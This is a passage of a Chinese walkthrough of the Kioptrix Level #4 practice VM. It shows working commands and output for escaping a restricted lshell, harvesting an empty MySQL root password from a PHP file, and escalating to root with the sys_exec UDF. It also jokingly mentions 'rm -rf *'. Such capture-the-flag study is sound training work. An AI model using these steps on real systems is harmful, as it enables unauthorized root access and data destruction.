Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.
Type `help' to learn how to use Xshell prompt.
[C:\~]$ ssh john@192.168.1.6
Connecting to 192.168.1.6:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
WARNING! The remote SSH server rejected X11 forwarding request.
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$
登录shell成功
3.2.2 shell逃逸
Xshell 7 (Build 0063)
Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.
Type `help' to learn how to use Xshell prompt.
[C:\~]$ ssh john@192.168.1.6
Connecting to 192.168.1.6:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
WARNING! The remote SSH server rejected X11 forwarding request.
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$
逃逸受限的shell成功。
3.3 mysql udf提权
3.3.1 查看服务
john@Kioptrix4:~$ ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 16:22 ? 00:00:03 /sbin/init
root 2 0 0 16:22 ? 00:00:00 [kthreadd]
root 3 2 0 16:22 ? 00:00:00 [migration/0]
root 4 2 0 16:22 ? 00:00:00 [ksoftirqd/0]
root 5 2 0 16:22 ? 00:00:00 [watchdog/0]
root 6 2 0 16:22 ? 00:00:00 [migration/1]
root 7 2 0 16:22 ? 00:00:00 [ksoftirqd/1]
root 8 2 0 16:22 ? 00:00:00 [watchdog/1]
root 9 2 0 16:22 ? 00:00:00 [events/0]
root 10 2 0 16:22 ? 00:00:00 [events/1]
root 11 2 0 16:22 ? 00:00:00 [khelper]
root 46 2 0 16:22 ? 00:00:00 [kblockd/0]
root 47 2 0 16:22 ? 00:00:00 [kblockd/1]
root 50 2 0 16:22 ? 00:00:00 [kacpid]
root 51 2 0 16:22 ? 00:00:00 [kacpi_notify]
root 247 2 0 16:22 ? 00:00:00 [kseriod]
root 291 2 0 16:22 ? 00:00:00 [pdflush]
root 292 2 0 16:22 ? 00:00:00 [pdflush]
root 293 2 0 16:22 ? 00:00:00 [kswapd0]
root 335 2 0 16:22 ? 00:00:00 [aio/0]
root 336 2 0 16:22 ? 00:00:00 [aio/1]
root 1742 2 0 16:22 ? 00:00:00 [ksuspend_usbd]
root 1746 2 0 16:22 ? 00:00:00 [khubd]
root 2180 2 0 16:22 ? 00:00:00 [ata/0]
root 2181 2 0 16:22 ? 00:00:00 [ata/1]
root 2185 2 0 16:22 ? 00:00:00 [ata_aux]
root 2629 2 0 16:22 ? 00:00:00 [scsi_eh_0]
root 2657 2 0 16:22 ? 00:00:00 [scsi_eh_1]
root 2658 2 0 16:22 ? 00:00:00 [scsi_eh_2]
root 2659 2 0 16:22 ? 00:00:00 [scsi_eh_3]
root 2660 2 0 16:22 ? 00:00:00 [scsi_eh_4]
root 2661 2 0 16:22 ? 00:00:00 [scsi_eh_5]
root 2662 2 0 16:22 ? 00:00:00 [scsi_eh_6]
root 2663 2 0 16:22 ? 00:00:00 [scsi_eh_7]
root 2664 2 0 16:22 ? 00:00:00 [scsi_eh_8]
root 2665 2 0 16:22 ? 00:00:00 [scsi_eh_9]
root 2666 2 0 16:22 ? 00:00:00 [scsi_eh_10]
root 2667 2 0 16:22 ? 00:00:00 [scsi_eh_11]
root 2668 2 0 16:22 ? 00:00:00 [scsi_eh_12]
root 2669 2 0 16:22 ? 00:00:00 [scsi_eh_13]
root 2670 2 0 16:22 ? 00:00:00 [scsi_eh_14]
root 2671 2 0 16:22 ? 00:00:00 [scsi_eh_15]
root 2672 2 0 16:22 ? 00:00:00 [scsi_eh_16]
root 2673 2 0 16:22 ? 00:00:00 [scsi_eh_17]
root 2674 2 0 16:22 ? 00:00:00 [scsi_eh_18]
root 2675 2 0 16:22 ? 00:00:00 [scsi_eh_19]
root 2676 2 0 16:22 ? 00:00:00 [scsi_eh_20]
root 2677 2 0 16:22 ? 00:00:00 [scsi_eh_21]
root 2678 2 0 16:22 ? 00:00:00 [scsi_eh_22]
root 2679 2 0 16:22 ? 00:00:00 [scsi_eh_23]
root 2680 2 0 16:22 ? 00:00:00 [scsi_eh_24]
root 2681 2 0 16:22 ? 00:00:00 [scsi_eh_25]
root 2682 2 0 16:22 ? 00:00:00 [scsi_eh_26]
root 2683 2 0 16:22 ? 00:00:00 [scsi_eh_27]
root 2684 2 0 16:22 ? 00:00:00 [scsi_eh_28]
root 2685 2 0 16:22 ? 00:00:00 [scsi_eh_29]
root 2686 2 0 16:22 ? 00:00:00 [scsi_eh_30]
root 2990 2 0 16:22 ? 00:00:00 [scsi_eh_31]
root 2992 2 0 16:22 ? 00:00:00 [scsi_eh_32]
root 3287 2 0 16:22 ? 00:00:00 [kjournald]
root 3458 1 0 16:22 ? 00:00:00 /sbin/udevd --daemon
root 3805 2 0 16:22 ? 00:00:00 [kgameportd]
root 4103 2 0 16:22 ? 00:00:00 [kpsmoused]
root 5400 1 0 16:22 tty4 00:00:00 /sbin/getty 38400 tty4
root 5401 1 0 16:22 tty5 00:00:00 /sbin/getty 38400 tty5
root 5408 1 0 16:22 tty2 00:00:00 /sbin/getty 38400 tty2
root 5410 1 0 16:22 tty3 00:00:00 /sbin/getty 38400 tty3
root 5413 1 0 16:22 tty6 00:00:00 /sbin/getty 38400 tty6
syslog 5449 1 0 16:22 ? 00:00:00 /sbin/syslogd -u syslog
root 5468 1 0 16:22 ? 00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog 5470 1 0 16:22 ? 00:00:00 /sbin/klogd -P /var/run/klogd/kmsg
root 5489 1 0 16:22 ? 00:00:00 /usr/sbin/sshd
root 5545 1 0 16:22 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe
root 5587 5545 0 16:22 ? 00:00:04 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root 5588 5545 0 16:22 ? 00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root 5662 1 0 16:22 ? 00:00:00 /usr/sbin/nmbd -D
root 5664 1 0 16:22 ? 00:00:00 /usr/sbin/smbd -D
root 5678 5664 0 16:22 ? 00:00:00 /usr/sbin/smbd -D
root 5679 1 0 16:22 ? 00:00:00 /usr/sbin/winbindd
root 5683 5679 0 16:22 ? 00:00:00 /usr/sbin/winbindd
daemon 5700 1 0 16:22 ? 00:00:00 /usr/sbin/atd
root 5711 1 0 16:22 ? 00:00:00 /usr/sbin/cron
root 5733 1 0 16:22 ? 00:00:00 /usr/sbin/apache2 -k start
dhcp 5783 1 0 16:22 ? 00:00:00 dhclient eth1
root 5790 1 0 16:22 tty1 00:00:00 /sbin/getty 38400 tty1
root 5806 5679 0 16:34 ? 00:00:00 /usr/sbin/winbindd
root 5807 5679 0 16:34 ? 00:00:00 /usr/sbin/winbindd
www-data 6714 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 6715 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 6716 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 6717 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 6718 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 6719 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 6720 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
root 6729 5489 0 17:58 ? 00:00:00 sshd: john [priv]
john 6731 6729 0 17:58 ? 00:00:00 sshd: john@pts/0
john 6732 6731 0 17:58 pts/0 00:00:00 python /bin/kshell
john 6733 6732 0 18:02 pts/0 00:00:00 sh -c /bin/bash
john 6734 6733 0 18:02 pts/0 00:00:00 /bin/bash
john 6753 6734 0 18:05 pts/0 00:00:00 ps -ef
确认mysql是 root权限启动
我们将尝试利用mysql 提权
3.3.2 php文件查找
john@Kioptrix4:~$ find /var/www -name *.php
/var/www/login_success.php
/var/www/index.php
/var/www/member.php
/var/www/checklogin.php
/var/www/logout.php
/var/www/robert/robert.php
/var/www/john/john.php
3.3.3 查看php文件
john@Kioptrix4:~$ cat /var/www/checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
ob_end_flush();
?>
发现登录mysql的用户名为:root,密码为空。
3.3.4 登录mysql数据库
john@Kioptrix4:~$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6258
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
登录成功
3.3.5 查看udf表
mysql> SELECT * FROM mysql.func;
+-----------------------+-----+---------------------+----------+
| name | ret | dl | type |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info | 0 | lib_mysqludf_sys.so | function |
| sys_exec | 0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)
脚本文件下载成功。
3.3.6 管理员用户组添加
利用 sys_exec()函数将john用户添加到管理员组。
mysql> select sys_exec('usermod -a -G admin john ');
+---------------------------------------+
| sys_exec('usermod -a -G admin john ') |
+---------------------------------------+
| NULL |
+---------------------------------------+
1 row in set (0.04 sec)
添加用户组成功。
3.3.7 切换超级管理员
密码为:MyNameIsJohn
john@Kioptrix4:~$ sudo su
[sudo] password for john:
root@Kioptrix4:/home/john#
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# whoami
root
我们到这里已经获得root权限,O(∩_∩)O哈哈~ 可以执行rm -rf * 了
3.3.8 flag
root@Kioptrix4:/home/john# cd /root
root@Kioptrix4:~# ls
congrats.txt lshell-0.9.12
root@Kioptrix4:~# cat congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
至此,我们关于此处渗透测试已经结束
渗透总结
在本次Kioptrix Level #4靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、SQL注入、使用udf进行系统提权等内容:
- 主机发现
- 目录扫描
- 端口扫描
- SQL注入
- shell逃逸
- udf系统提权
参考文章
- Kioptrix Level #4靶场
- arp-scan使用
- Netdiscover基本使用
- nmap详细使用教程
- 黑客工具之whatweb详细使用教程
- dirsearch - Web path discovery
- Sqlmap使用指南(手把手保姆版)持续更新
- mySql的UDF是什么
- Kioptrix Level #4
![[ue5]建模场景学习笔记(5)——必修内容可交互的地形,交互沙(2)](https://img-blog.csdnimg.cn/direct/fb477df0bdae48f48100a38f630431b9.png)
